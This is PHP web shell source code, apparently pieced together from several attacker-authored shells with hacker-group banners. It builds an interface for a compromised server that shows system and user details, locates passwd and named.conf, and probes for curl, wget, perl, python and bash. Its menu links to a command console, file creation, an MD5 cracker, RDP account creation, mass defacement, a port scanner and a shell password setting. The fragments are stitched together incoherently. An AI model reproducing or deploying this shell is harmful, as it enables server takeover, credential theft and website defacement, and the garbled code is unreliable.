if (exe('perl -h')) {
         return showstat("on");
     } else {
         return showstat("off");
     }
 }
 if (isset($_GET['cd'])) {
     $s_patch_i = $_GET['cd'];
 } else {
     $s_patch_i = getcwd();
 }
 $s_info .= '<tr><td>' . $s_software . '</td></tr>';
 $s_info .= '<tr><td>' . $s_system . '</td></tr>';
 $s_info .= '<tr><td>Server IP : ' . $s_server_ip . ' ' . $s_negara . '| ' . $s_my_ip . ' [<a href="http://facebook.com/bug7sec">SHOR7CUT</a>][<a href="?shc=logout">LOGOUT</a>]</td></tr>';
 $s_info .= '<tr><td>HDD ' . shc_byte(disk_free_space("/")) . '/' . shc_byte(disk_total_space("/")) . '</td></tr>';
 $s_info .= '<tr><td>Disabled Functions : ' . showdisablefunctions() . '</td></tr>';
 $s_info .= '<tr><td>[' . $s_os . ']' . $s_mode . '|' . $s_mysql_connect . '|' . $s_mssql_connect . '|' . $s_Oracle . '|' . $s_curl . '|' . $s_dis_error . '</td></tr>';
 /* nav */
 $s_nav .= '[<a href="?">Home</a>]';
 $s_nav .= '[<a href="?shc_command=dir">console</a>]';
 $s_nav .= '[<a href="?shc=newfile&loc=' . $s_patch_i . '">Buat File</a>]';
 $s_nav .= '[<a href="?shc=tools">Tools Pack</a>]';
 $s_nav .= '[<a href="?shc=wp-admin">Wp-Admin</a>]';
 $s_nav .= '[<a href="?shc=md5">MD5 Cracker</a>]';
 $s_nav .= '[<a href="?shc=krdp">K-RDP</a>]';
 $s_nav .= '[<a href="?shc=mdeface">Mass Deface</a>]';
 $s_nav .= '[<a href="?shc=ipresolver">IP Resolver (cloudflare)</a>]';
 $s_nav .= '[<a href="?shc=portscan">Port Scanner</a>]';
 $s_nav .= '[<a href="?shc=shellpass">Password</a>]';
 $s_nav .= '[<a href="?shc=binchecker">Bin Checker</a>]';
 /*------*/
</style>
<div class=info>
<table bgcolor=#ff0000 width=100%px height=20px><tr>
<td><font color=#fff size=1px><center>x00x Server Info[Coded By: DamaneDz] & [Update Ideas By:Mauritania Attacker]</center></font></td>
</tr></table>
<font color=#000 size=2px>
<center><span><font color='#111'>
<br> UName -a: <font color=blue>".@php_uname()." </font>|</br>
<br> Hostname: <font color=blue>".$_SERVER['HTTP_HOST']."</font>|</br>
<br> Software : <font color=blue>".@getenv("SERVER_SOFTWARE")." </font>| </br>
<br> PHP Version: <font color=blue>".@phpversion()." </font>|</br>
<br> Current Dir: <font color=blue>{$pwd} |</font></br>
<br> ID:<font color=blue>" .@getmyuid()."(".@get_current_user().") </font>- UID:<font color=blue>".@getmyuid()."(".@get_current_user().") </font>- GID:<font color=blue>".@getmygid()."(".@get_current_user().") </font>|</br>
<br> Your IP:<font color=blue>".$_SERVER["REMOTE_ADDR"]." </font>| The Server IP:<font color=blue>".@gethostbyname($_SERVER["HTTP_HOST"])." </font>|</br>
<br> Safe Mode: $hsafemode | Open_BaseDir: ".openbase_dir()."|</br>
<br> Disabled Functions: ".@showdisablefunctions()."|</br>
<br> named.conf File is: ".named_conf()." | passwd File is: ".passwd()."</br>
<br>
MySQL: ".@testmysql()."|
MSSQL: ".@testmssql()."|
Oracle: ".@testoracle()."|
PostgreSQL: ".@testpostgresql()."|
cURL: ".@testcurl()."|
Fetch: ".@testfetch()."|
WGet: ".@testwget()."|
Perl: ".@testperl()."|
Python: ".@testpy()."|
Bash: ".@testsh()."|
</center>
</font>
<br/>
 echo "<div class=barheader2><h3>{$sh_name}</h3>| pr0j3c7 m4yh3m | 4n71-s3c m0v3m3n7 | f**k wh173h475 |</div>\n";
 echo "<table id=pagebar><tr><td width=50%><p>" . "50f7w4r3 : " . $DISP_SERVER_SOFTWARE . " - <a href=" . $surl . "antisec=phpini>php.ini</a><br>" . "{$hsafemode}<br>" . "OS : " . php_uname() . "<br>";
 if (!$win) {
     echo "Us3r 1D : " . s3x3c("id");
 } else {
     echo "User : "******"</p></td>" . "<td width=50%><p>53rv3r 1P : <a href=http://whois.domaintools.com/" . gethostbyname($_SERVER["HTTP_HOST"]) . ">" . gethostbyname($_SERVER["HTTP_HOST"]) . "</a> - " . "Y0ur 1P - h1d3 17 v14 t0r n37w0rk : <a href=http://whois.domaintools.com/" . $_SERVER["REMOTE_ADDR"] . ">" . $_SERVER["REMOTE_ADDR"] . "</a><br>";
 if ($win) {
     echo "Dr1v3s : " . disp_drives($d, $surl) . "<br>";
 }
 echo "Fr33sp4c3 : " . disp_freespace($d);
 echo "</p></td></tr>";
 echo "<tr><td colspan=2><p>";
 echo "MySQL: " . testmysql() . " MSSQL: " . testmssql() . " Oracle: " . testoracle() . " MSSQL: " . testmssql() . " PostgreSQL: " . testpostgresql() . " cURL: " . testcurl() . " WGet: " . testwget() . " Fetch: " . testfetch() . " Perl: " . testperl() . "<br>";
 echo "Disabled Functions: " . showdisablefunctions();
 echo "</p></td></tr>";
 echo "<tr><td colspan=2 id=mainmenu>";
 if (count($quicklaunch2an) > 0) {
     foreach ($quicklaunch2an as $item) {
         $item[1] = str_replace("%d", urlencode($d), $item[1]);
         $item[1] = str_replace("%sort", $sort, $item[1]);
         $v = realpath($d . "..");
         if (empty($v)) {
             $a = explode(DIRECTORY_SEPARATOR, $d);
             unset($a[count($a) - 2]);
             $v = join(DIRECTORY_SEPARATOR, $a);
         }
         $item[1] = str_replace("%upd", urlencode($v), $item[1]);
         echo "<a href=\"" . $item[1] . "\">" . $item[0] . "</a>\n";
     }